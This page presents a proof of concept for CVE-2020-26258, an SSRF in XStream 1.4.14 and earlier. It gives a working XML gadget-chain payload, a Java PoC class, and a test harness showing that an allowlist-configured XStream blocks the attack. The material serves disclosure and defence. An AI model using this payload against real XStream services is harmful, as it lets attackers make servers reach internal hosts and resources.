# CVE-2020-26258 XStream SSRF

PoC (the XML element tags were lost when this page was rendered; the payload below is the one published in the XStream advisory linked under ref, with the values this page shows):

```xml
<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
        <dataHandler>
          <dataSource class='javax.activation.URLDataSource'>
            <url>http://localhost:8080/internal/:</url>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <string>test</string>
  </entry>
</map>
```

The `NativeString` is the map key. When XStream puts it into the `HashMap`, `hashCode()` is called, which calls `toString()` on the `Base64Data` value, which in turn reads the `DataHandler` stream from the `URLDataSource`, so the URL is fetched during unmarshalling. With the default (blacklist-only) security setup of XStream 1.4.14 and earlier, this is all it takes:

```java
XStream xstream = new XStream();
xstream.fromXML(xml);
```

**CVE_2020_26258.java**

```java
import com.thoughtworks.xstream.XStream;

/*
CVE-2020-26258: A Server-Side Request Forgery can be triggered when unmarshalling
with XStream, reading a data stream from an arbitrary URL that references a resource
on an intranet or the local host.

Affected: all versions up to and including 1.4.14

https://x-stream.github.io/CVE-2020-26258.html

XStream warns at startup: "Security framework of XStream not explicitly initialized,
using predefined black list on your own risk." That predefined blacklist does not
cover the gadget chain used here.
*/

public class CVE_2020_26258 {
    public static void main(String[] args) {
        // NativeString is used as the map key: inserting it calls hashCode(), which calls
        // toString() on the Base64Data value, which opens the URLDataSource stream.
        String ssrf_xml =
            "<map>\n" +
            "  <entry>\n" +
            "    <jdk.nashorn.internal.objects.NativeString>\n" +
            "      <flags>0</flags>\n" +
            "      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n" +
            "        <dataHandler>\n" +
            "          <dataSource class='javax.activation.URLDataSource'>\n" +
            "            <url>http://localhost:8989/internal/:</url>\n" +
            "          </dataSource>\n" +
            "          <transferFlavors/>\n" +
            "        </dataHandler>\n" +
            "        <dataLen>0</dataLen>\n" +
            "      </value>\n" +
            "    </jdk.nashorn.internal.objects.NativeString>\n" +
            "    <string>test</string>\n" +
            "  </entry>\n" +
            "</map>\n";

        XStream xstream = new XStream();
        xstream.fromXML(ssrf_xml);
    }
}
```
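The following is an added example, not code from this page or from the jas502n repository. It starts a local HTTP listener on an ephemeral port, feeds the same gadget chain (pointed at that listener) first to a default-configured `XStream` and then to one initialised with an explicit allowlist, and reports whether the listener was hit in each case. The listener path `/internal/`, the class name `XStreamSsrfCheck` and the allowlist contents are assumptions for the demonstration; a real application would allow exactly the types it unmarshals. Observing the hit requires JDK 8 (for `jdk.nashorn.internal.objects.NativeString` and the internal JAXB `Base64Data`) and XStream 1.4.14 or earlier; on later versions the default blacklist rejects the payload as well.

```java
import com.sun.net.httpserver.HttpServer;
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

import java.net.InetSocketAddress;
import java.util.HashMap;
import java.util.Map;
import java.util.concurrent.atomic.AtomicInteger;

public class XStreamSsrfCheck {

    // Same gadget chain as the PoC above; the URL points at our own listener.
    static String payload(int port) {
        return "<map>\n"
            + "  <entry>\n"
            + "    <jdk.nashorn.internal.objects.NativeString>\n"
            + "      <flags>0</flags>\n"
            + "      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>\n"
            + "        <dataHandler>\n"
            + "          <dataSource class='javax.activation.URLDataSource'>\n"
            + "            <url>http://127.0.0.1:" + port + "/internal/</url>\n"
            + "          </dataSource>\n"
            + "          <transferFlavors/>\n"
            + "        </dataHandler>\n"
            + "        <dataLen>0</dataLen>\n"
            + "      </value>\n"
            + "    </jdk.nashorn.internal.objects.NativeString>\n"
            + "    <string>test</string>\n"
            + "  </entry>\n"
            + "</map>\n";
    }

    // Hardened XStream: deny everything, then allow only what this input needs
    // (assumed allowlist for the demo: a map of strings).
    static XStream hardened() {
        XStream xs = new XStream();
        xs.addPermission(NoTypePermission.NONE);          // checked last: reject anything not allowed below
        xs.addPermission(NullPermission.NULL);
        xs.addPermission(PrimitiveTypePermission.PRIMITIVES);
        xs.allowTypes(new Class[] { String.class, Map.class, HashMap.class });
        return xs;
    }

    public static void main(String[] args) throws Exception {
        AtomicInteger hits = new AtomicInteger();
        HttpServer server = HttpServer.create(new InetSocketAddress("127.0.0.1", 0), 0);
        server.createContext("/internal/", ex -> {
            hits.incrementAndGet();
            ex.sendResponseHeaders(200, -1);              // empty body is enough for Base64Data
            ex.close();
        });
        server.start();
        String xml = payload(server.getAddress().getPort());

        try {
            // 1. Default configuration (vulnerable on XStream <= 1.4.14): the request is
            //    issued while the map key is hashed, before fromXML even returns.
            try {
                new XStream().fromXML(xml);
            } catch (RuntimeException e) {
                // a conversion error here does not matter: the fetch has already happened
            }
            System.out.println("default XStream: listener hits = " + hits.get());

            // 2. Allowlisted configuration: the NativeString element is refused before
            //    any object in the chain is instantiated, so no request is made.
            int before = hits.get();
            try {
                hardened().fromXML(xml);
                System.out.println("hardened XStream: payload was NOT rejected");
            } catch (ForbiddenClassException e) {
                System.out.println("hardened XStream: rejected " + e.getMessage()
                    + ", new listener hits = " + (hits.get() - before));
            }
        } finally {
            server.stop(0);
        }
    }
}
```

Compile against the XStream jar on the classpath and run on JDK 8. The first line should report one hit and the second zero; if the hardened run reports a hit, the allowlist is wider than intended (for example because of `allowTypesByWildcard` patterns elsewhere in the application).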

ref:

https://raw.githubusercontent.com/jas502n/CVE-2020-26259/main/CVE_2020_26258.java
